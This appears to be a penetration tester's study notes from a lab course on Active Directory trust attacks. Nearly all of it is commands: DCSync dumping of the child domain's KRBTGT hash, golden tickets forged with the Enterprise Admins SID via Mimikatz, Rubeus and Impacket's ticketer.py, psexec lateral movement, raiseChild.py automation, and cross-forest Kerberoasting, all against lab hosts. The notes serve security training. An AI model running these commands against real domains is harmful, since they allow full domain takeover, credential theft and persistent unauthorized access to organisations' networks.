Comment on page
Domain Trust Enumeration
Get-Domaintrust
Get-DomainTrustMapping
Get-DomainUser -Domain LOGISTICS.INLANEFREIGHT.LOCAL | select SamAccountName
To perform this attack after compromising a child domain, we need the following:
- 1.The KRBTGT hash for the child domain
- 2.The SID for the child domain
- 3.The name of a target user in the child domain (does not need to exist!)
- 4.The FQDN of the child domain.
- 5.The SID of the Enterprise Admins group of the root domain.
- 6.With this data collected, the attack can be performed with Mimikatz.
mimikatz # lsadump::dcsync /user:LOGISTICS\krbtgt
Get-DomainSID
# Can be a fake usernamr
Get-Domaintrust
Get-DomainGroup -Domain INLANEFREIGHT.LOCAL -Identity "Enterprise Admins" | select distinguishedname,objectsid
# Mimikatz Way
kerberos::golden /user:hacker /domain:LOGISTICS.INLANEFREIGHT.LOCAL /sid:S-1-5-21-2806153819-209893948-922872689 /krbtgt:9d765b482771505cbe97411065964d5f /sids:S-1-5-21-3842939050-3880317879-2865463114-519 /ptt
# Rubeus Way
\Rubeus.exe golden /rc4:9d765b482771505cbe97411065964d5f /domain:LOGISTICS.INLANEFREIGHT.LOCAL /sid:S-1-5-21-2806153819-209893948-922872689 /sids:S-1-5-21-3842939050-3880317879-2865463114-519 /user:hacker /ptt
# List Tickets
klist
# Mimikatz
lsadump::dcsync
We can also perform the attack shown in the previous section from a Linux attack host. To do so, we'll still need to gather the same bits of information:
- 1.The KRBTGT hash for the child domain
- 2.The SID for the child domain
- 3.The name of a target user in the child domain (does not need to exist!)
- 4.The FQDN of the child domain
- 5.The SID of the Enterprise Admins group of the root domain
secretsdump.py logistics.inlanefreight.local/[email protected] -just-dc-user LOGISTICS/krbtgt
lookupsid.py logistics.inlanefreight.local/[email protected] | grep "Domain SID"
Can be any name
lookupsid.py logistics.inlanefreight.local/[email protected] | grep -B12 "Enterprise Admins"
ticketer.py -nthash 9d765b482771505cbe97411065964d5f -domain LOGISTICS.INLANEFREIGHT.LOCAL -domain-sid S-1-5-21-2806153819-209893948-922872689 -extra-sid S-1-5-21-3842939050-3880317879-2865463114-519 hacker
export KRB5CCNAME=hacker.ccache
psexec.py LOGISTICS.INLANEFREIGHT.LOCAL/[email protected] -k -no-pass -target-ip 172.16.5.5
raiseChild.py -target-exec 172.16.5.5 LOGISTICS.INLANEFREIGHT.LOCAL/htb-student_adm
# Enumerate Cross Forest Users with SPN
Get-DomainUser -SPN -Domain FREIGHTLOGISTICS.LOCAL | select SamAccountName
# Rubeus /Domain flag
.\Rubeus.exe kerberoast /domain:FREIGHTLOGISTICS.LOCAL /user:mssqlsvc /nowrap
# Check Foreign Groups
Get-DomainForeignGroupMember -Domain FREIGHTLOGISTICS.LOCAL
# Convert SID
Convert-SidToName <SID>
# Login, if we are part of the administrators group
Enter-PSSession -ComputerName ACADEMY-EA-DC03.FREIGHTLOGISTICS.LOCAL -Credential INLANEFREIGHT\administrator
![[Pasted image 20230428181936.png]]
# Using -target-domain
GetUserSPNs.py -request -target-domain FREIGHTLOGISTICS.LOCAL INLANEFREIGHT.LOCAL/wley
Last modified 6mo ago